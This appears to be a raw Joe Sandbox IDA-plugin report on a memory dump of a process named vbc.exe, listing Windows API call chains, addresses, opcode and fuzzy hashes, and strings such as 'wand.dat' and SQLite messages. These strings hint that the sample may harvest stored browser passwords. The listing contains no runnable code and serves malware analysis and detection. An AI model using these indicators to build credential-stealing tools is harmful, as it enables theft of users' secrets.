                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4053608372-0
                                                                                                                                                                        • Opcode ID: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                        • Instruction ID: 7c4f126962bd8a7e2ff3a65b0fa2dbedc4b8b396d66bab6395f0ad674673df12
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
                                                                                                                                                                        • Instruction Fuzzy Hash: B501C8B550411DBF7F115FA5ECC1CFF7AACEA453E8721032AF414E2190D6348E405AB8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(?), ref: 0040B620
                                                                                                                                                                        • GetWindowRect.USER32 ref: 0040B62D
                                                                                                                                                                        • GetClientRect.USER32 ref: 0040B638
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 0040B648
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4247780290-0
                                                                                                                                                                        • Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                        • Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
                                                                                                                                                                        • Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                        • memset.MSVCRT ref: 00444333
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                          • Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
                                                                                                                                                                          • Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                        Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
• Opcode ID: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
• Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
• Opcode Fuzzy Hash: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
• Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
• Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
• Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
• Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D937
• memset.MSVCRT ref: 0040D94E
  • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
  • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
• _snwprintf.MSVCRT ref: 0040D97D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
• Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
• Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
• Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
• Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
• Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
• Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: FileNameOpenwcscpy
• String ID: X$xK@
• API String ID: 3246554996-3735201224
• Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
• Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
• Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
• Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
  • Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF
• CreateFontIndirectW.GDI32(?), ref: 0040105D
• SendDlgItemMessageW.USER32 ref: 0040107C
• SendDlgItemMessageW.USER32 ref: 0040109A
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
• Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
• Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
• Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
• Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
• Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
• Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2574300362-880857682
• Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
• Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
• Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
• Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
• Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
• Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
• Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
• Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Snapshot File (Joe Sandbox IDA Plugin): hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
• Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                        • Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
                                                                                                                                                                        • Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004019F1: GetMenu.USER32(?), ref: 00401A0F
                                                                                                                                                                          • Part of subcall function 004019F1: GetSubMenu.USER32 ref: 00401A16
                                                                                                                                                                          • Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E
                                                                                                                                                                          • Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
                                                                                                                                                                          • Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73
                                                                                                                                                                        • GetMenu.USER32(?), ref: 0040E7C9
                                                                                                                                                                        • GetSubMenu.USER32 ref: 0040E7D6
                                                                                                                                                                        • GetSubMenu.USER32 ref: 0040E7D9
                                                                                                                                                                        • CheckMenuRadioItem.USER32 ref: 0040E7E5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1889144086-0
                                                                                                                                                                        • Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                        • Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
                                                                                                                                                                        • Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                        • Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
                                                                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417A25
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417A3B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1661045500-0
                                                                                                                                                                        • Opcode ID: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
                                                                                                                                                                        • Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d89631bf252ae2f2c4c8445ece2b1e7c45986c35925c9de674870ee8545aac5
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0
                                                                                                                                                                        • memcpy.MSVCRT ref: 0042E519
                                                                                                                                                                        Strings
                                                                                                                                                                        • virtual tables may not be altered, xrefs: 0042E470
                                                                                                                                                                        • sqlite_altertab_%s, xrefs: 0042E4EA
                                                                                                                                                                        • Cannot add a column to a view, xrefs: 0042E486
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset
                                                                                                                                                                        • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                        • API String ID: 1297977491-2063813899
                                                                                                                                                                        • Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                        • Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                        • Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID: $, $CREATE TABLE
                                                                                                                                                                        • API String ID: 3510742995-3459038510
                                                                                                                                                                        • Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                        • Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C518E71D00119EFDB10DF98C491AAFB7B5EF48318F20819BD945AB205E738AA45CF99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00404B07
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                          • Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                          • Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                          • Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                          • Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                          • Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                          • Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
                                                                                                                                                                          • Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
                                                                                                                                                                          • Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
                                                                                                                                                                          • Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81
                                                                                                                                                                          • Part of subcall function 004088A0: GetOpenFileNameW.COMDLG32(?), ref: 004088E9
                                                                                                                                                                          • Part of subcall function 004088A0: wcscpy.MSVCRT ref: 004088F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                                        • String ID: *.*$dat$wand.dat
                                                                                                                                                                        • API String ID: 3589925243-1828844352
                                                                                                                                                                        • Opcode ID: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                        • Instruction ID: 189ab15ad594b46ceda1379ae2a6b1c5413d0dce04db73f13dfcb8633a17526e
                                                                                                                                                                        • Opcode Fuzzy Hash: dba498f9c2a615ee4bb20f4d87602121c5d51198321a5fa312053a7b5bc0946c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0841B771600205AFEF10EF61DD86ADE77B5FF40314F10802BFA05A71D2EB79A9958B98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
                                                                                                                                                                          • Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040E4B0
                                                                                                                                                                        • _wtoi.MSVCRT ref: 0040E4BC
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040E50A
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040E51B
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp$??2@??3@_wtoiwcslen
• String ID:
• API String ID: 1549203181-0
• Opcode ID: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
• Instruction ID: a8ded69f91e0d7bf63f89fae3ec1b4bc8203dfd4cc2a8694f23455ab63246b5f
• Opcode Fuzzy Hash: 0f4392e1858a779833333a0416b24e28d587e9bbbfd919652716bcc233ef85a3
• Instruction Fuzzy Hash: 06417131900204EFCF21DF9AC980A99B7B5EF48358F1548BAEC05EB396E738DA509B55
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpymemsetstrlen
• String ID: Ap@$Ap@
• API String ID: 160209724-724177859
• Opcode ID: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
• Instruction ID: e2bdeeadc1d90758f2de231e66b6cadccfeb655152d102dc9dd3295dcddd65f9
• Opcode Fuzzy Hash: a22eb759962dce0ece25da61dae4aaf75057113ae2506cb2c4c354c91a5046fa
• Instruction Fuzzy Hash: 10313371A042069BDB14DFA8AC80BAFB7B89F04310F1100BEE916F72C1DB78DA518769
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040F882
  • Part of subcall function 004087A4: ShellExecuteW.SHELL32(?,open,?,Function_0004552C,Function_0004552C,00000005), ref: 004087BA
• SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040F8F2
• GetMenuStringW.USER32 ref: 0040F90C
• GetKeyState.USER32(00000010), ref: 0040F938
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ExecuteMenuMessageSendShellStateStringmemset
• String ID:
• API String ID: 3550944819-0
• Opcode ID: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
• Instruction ID: 0cce36cd3d59050ebbb4ae1468268e07e9567f629d0a6bc52b2b72a07dc00bda
• Opcode Fuzzy Hash: 9a1b8f86d4c82467fb85a2d141e0833d89a0986062affb40e8a5ce6add93c36d
• Instruction Fuzzy Hash: 7041C375500305EBDB30AF15CC88B9673B4EF50325F10857AE9686BAE2C7B8AD89CB14
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$free
• String ID: Z6@
• API String ID: 2888793982-1638572689
• Opcode ID: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
• Instruction ID: 1cd3d00781b25d2b94616f77ccd2c248328d95a28ed1044bfffefbc926401994
• Opcode Fuzzy Hash: d95a093917320c7edcb790d909f4cc8d04b331544c50e5d8cbf7f629eee5e05f
• Instruction Fuzzy Hash: EB219034500605EFCB60DF29C98185ABBF6FF84314720467EE852E3790E739EE019B44
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
• Instruction ID: 2b976a00fcfd181f23c33ae21356c60783d23841694cc8dee0d8ac2aa3eeffc6
• Opcode Fuzzy Hash: 3146a9f0800fb98ab8d741e68a911a3dc47cf6252b201eb637f31c079c1ab91f
• Instruction Fuzzy Hash: EA112BB29003057BDB249F15D884DEA77A9EBA0344700062FFD0696251F6BDDED9C7D8
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
• Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
• Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
• Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00413DA4
  • Part of subcall function 004089E1: _snwprintf.MSVCRT ref: 00408A26
  • Part of subcall function 004089E1: memcpy.MSVCRT ref: 00408A36
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00413DCD
• memset.MSVCRT ref: 00413DD7
• GetPrivateProfileStringW.KERNEL32 ref: 00413DF9
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
• Opcode ID: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
• Instruction ID: e0c1f09ad2cb5d60bcfcc92858fd4079171207d9a16d9363f081e68af551c4db
• Opcode Fuzzy Hash: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
• Instruction Fuzzy Hash: 4D1165B2500129BFEF11AF64DC06EDE7B79EF44711F10006AFB05B2151EA359A608F9D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 004146C4
• SHBrowseForFolderW.SHELL32(?), ref: 004146F6
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
• wcscpy.MSVCRT ref: 0041471D
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
• Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
• Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
• Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
